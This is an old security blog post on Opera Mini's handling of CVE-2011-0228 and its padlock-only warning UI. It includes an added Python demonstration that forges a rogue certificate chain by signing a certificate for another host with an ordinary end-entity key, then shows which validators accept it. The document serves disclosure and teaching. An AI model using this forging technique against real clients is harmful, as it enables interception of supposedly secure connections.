August 2011 Archives

Tue Aug 9 18:34:11 CEST 2011

CVE-2011-0228 and the Opera Mini UI-Design

Recurity Labs received user reports, confirmed by our own tests, that Opera Mini is affected by the CVE-2011-0228 X.509 certificate validation issue originally reported for Apple iOS.
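The post does not spell out what the validation issue is, so as an added illustration (not Recurity's iSSL test code and not Opera's or Apple's) here is the chain shape behind CVE-2011-0228: the iOS flaw was that basicConstraints was not checked on issuers, so any end-entity certificate could sign a further certificate that then chained to a trusted root. The script builds a trusted root, a legitimate end-entity "leaf" (CA:FALSE), and a rogue server certificate for a target host signed with the leaf's key, then compares a validator that only follows signatures to the root with one that also enforces the CA flag on every issuer. It assumes the `cryptography` package; all names and keys are constructed placeholders.

```python
"""Added illustration of the CVE-2011-0228 chain shape (constructed example).

Chain: trusted root (CA:TRUE) -> legitimate end-entity "leaf" (CA:FALSE)
-> rogue server certificate for a target host, signed by the leaf's key.
A validator that only follows signatures back to a trusted root accepts
the rogue certificate; one that also enforces basicConstraints on every
issuer rejects it. Requires the `cryptography` package.
"""
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import NameOID


def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])


def make_cert(subject_cn, subject_key, issuer_cn, issuer_key, is_ca):
    """Build a certificate signed by issuer_key with an explicit basicConstraints."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return (
        x509.CertificateBuilder()
        .subject_name(_name(subject_cn))
        .issuer_name(_name(issuer_cn))
        .public_key(subject_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(minutes=5))
        .not_valid_after(now + datetime.timedelta(days=1))
        .add_extension(x509.BasicConstraints(ca=is_ca, path_length=None), critical=True)
        .sign(issuer_key, hashes.SHA256())
    )


def build_rogue_chain(target_host="target.example"):
    """Constructed sample chain [rogue, leaf, root]; all names are placeholders."""
    root_key, leaf_key, rogue_key = (ec.generate_private_key(ec.SECP256R1()) for _ in range(3))
    root = make_cert("Example Root CA", root_key, "Example Root CA", root_key, is_ca=True)
    # Ordinary end-entity certificate: correctly marked CA:FALSE by the root.
    leaf = make_cert("legit.example", leaf_key, "Example Root CA", root_key, is_ca=False)
    # The attack: the leaf's holder uses its key to sign a cert for someone else's host.
    rogue = make_cert(target_host, rogue_key, "legit.example", leaf_key, is_ca=False)
    return [rogue, leaf, root], root


def signed_by(cert, issuer):
    """True if cert's signature verifies under issuer's public key (ECDSA here)."""
    try:
        issuer.public_key().verify(
            cert.signature, cert.tbs_certificate_bytes, ec.ECDSA(cert.signature_hash_algorithm)
        )
        return True
    except InvalidSignature:
        return False


def is_ca(cert):
    """basicConstraints CA flag; per RFC 5280 a missing extension means 'not a CA'."""
    try:
        return cert.extensions.get_extension_for_class(x509.BasicConstraints).value.ca
    except x509.ExtensionNotFound:
        return False


def validate(chain, trusted_root, enforce_basic_constraints):
    """Walk leaf -> root. With enforce_basic_constraints=False this mirrors the
    vulnerable behaviour: signatures chain to a trusted root, so the rogue
    certificate is accepted even though its issuer is not a CA."""
    for cert, issuer in zip(chain, chain[1:]):
        if not signed_by(cert, issuer):
            return False
        if enforce_basic_constraints and not is_ca(issuer):
            return False
    return chain[-1] == trusted_root and signed_by(trusted_root, trusted_root)


if __name__ == "__main__":
    chain, root = build_rogue_chain()
    print("signature-only validator accepts rogue cert:", validate(chain, root, False))
    print("basicConstraints-enforcing validator accepts it:", validate(chain, root, True))
```

The point of the comparison is that every signature in the rogue chain is genuine; only the CA flag on the intermediate distinguishes the attack from a legitimate chain, which is why a client that skips that check can be fed a valid-looking certificate for any host by anyone holding an ordinary certificate.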

After filing a bug with Opera Software (ID SKIRNE-136848), we also tried to contact them directly. With some external help, we managed to reach security people at Opera and received the following interesting statement:

Thanks for reporting an issue with Opera.

While you are correct that Opera Mini does not display a certificate
warning about chains with unknown Root certificates, there is, however,
a significant difference between what happened in iOS and what happens
in Opera Mini. Opera Mini will not indicate that such pages are secure,
that is, no padlock or similar indication is displayed for the web site
affected by this, giving the same security indications as it would for
an unencrypted site, which is the same as would have been displayed if
the user manually accepted the certificate.

Not showing a dialog was a design decision by the Opera Mini team, due
to the transcoder architecture of Opera Mini, and in part the
complexity of having the transcoder (proxy) server display a dialog at
the device and then obtain the result before continuing.

For more about Opera Mini security see
http://www.opera.com/mobile/help/faq/#security.

The FAQ page referenced above tells us that Opera Mini shows a padlock (in the top right corner) when the connection to the web site is secured, and no padlock for unsecured sites using plain HTTP.
When testing Opera Mini against https://iSSL.recurity.com, no padlock is shown. However, the URL in the address bar still reads https://, with no indication that anything might be wrong with it. Judging from the user feedback we received, it is not clear to users that the absence of the padlock means that certificate validation failed.
In our emulation environment we also found that on small-screen devices the padlock may not even be on screen while a site is loading.

Opera could easily indicate the failed certificate verification by means other than a dialog box, e.g. a red background in the address bar, as Internet Explorer does.
Given the current approach, we recommend not using Opera Mini for anything that requires a secure connection to a web site, especially since Opera Mini does not provide end-to-end encryption in any case: the connection is terminated at Opera's transcoder proxy, not at the web site.


Posted by FX | Permanent link